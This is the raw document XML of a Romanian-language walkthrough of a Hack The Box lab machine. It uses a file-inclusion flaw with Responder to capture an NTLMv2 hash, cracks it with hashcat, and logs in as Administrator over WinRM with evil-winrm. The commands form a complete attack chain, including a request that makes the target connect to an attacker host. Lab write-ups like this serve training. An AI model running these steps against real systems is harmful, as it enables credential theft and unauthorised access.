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Pentru aceasta masina, deja stim ca avem un site, dar cand intram pe acel ip, suntem redirectati pe un site la care nu avem acces.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46583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65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>Pentru a putea lua ceva informatie insa, putem sa folosim curl. Pentru a putea incepe, trebuie sa adaugam domeniul in /etc/hosts. Adaugam urmatoarea linie la final:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>10.129.53.193</w:t>
        <w:tab/>
        <w:t>unika.htb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Acum cand dam curl, putem sa vedem structura siteului.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 xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:shd w:fill="FFFF00" w:val="clear"/>
          </w:rPr>
          <w:t>http://unika.htb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; site.html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Dupa analiza, pare interesante urmatoarele randuri.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-63500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4772025" cy="47625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Poate aparea un LFI sau RFI.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Acum, deschidem o instanta Responder sa generam un hash NTLMv2.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sudo python3 Responder.py -I tun0 -v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auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">In alt terminal, dam un </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>touch test.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> si dam urmatoarea cerere:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:shd w:fill="FFFF00" w:val="clear"/>
          </w:rPr>
          <w:t>http://unika.htb/index.php?page=//10.10.17.159/test.txt</w:t>
        </w:r>
      </w:hyperlink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Acum pe celalat terminal vedem hashul NTLMv2:</w:t>
        <w:br/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40640</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>265430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="104838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048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 Folosim acum hashcat sa calculam rezultatul.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hashcat -m 5600 hash.txt $HOME/wordlist/SecLists/Passwords/Cracked-Hashes/milw0rm-dictionary.txt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O sa vedem ca parola este </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>badminton</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>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Ii dam nmap la site sa vedem daca mai dam de un port pe care ne putem conecta acum ca stim parola.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nmap -Pn 10.129.53.193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22225</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>100330</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4981575" cy="96202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5985. Portul default pentru WinRM :D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Ne conectam la masina cu parola calculata mai sus.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evil-winrm -i 10.129.53.193 -u Administrator -p badminton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auto" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">Navigam pana la users si vedem ca exista un user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="FFFF00" w:val="clear"/>
        </w:rPr>
        <w:t>mike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:fill="auto" w:val="clear"/>
        </w:rPr>
        <w:t>. La el pe Desktop vedem ca exista un fisier flag.txt.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92087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92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Ii dam download si il analizam la noi pe masina.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98488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984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3530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35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unika.htb/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://unika.htb/index.php?page=//10.10.17.159/test.txt" TargetMode="Externa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LibreOffice/25.2.3.2$Linux_X86_64 LibreOffice_project/520$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>3</Pages>
  <Words>210</Words>
  <Characters>1157</Characters>
  <CharactersWithSpaces>1356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2026-06-18T23:37:40Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-19T00:25:50Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>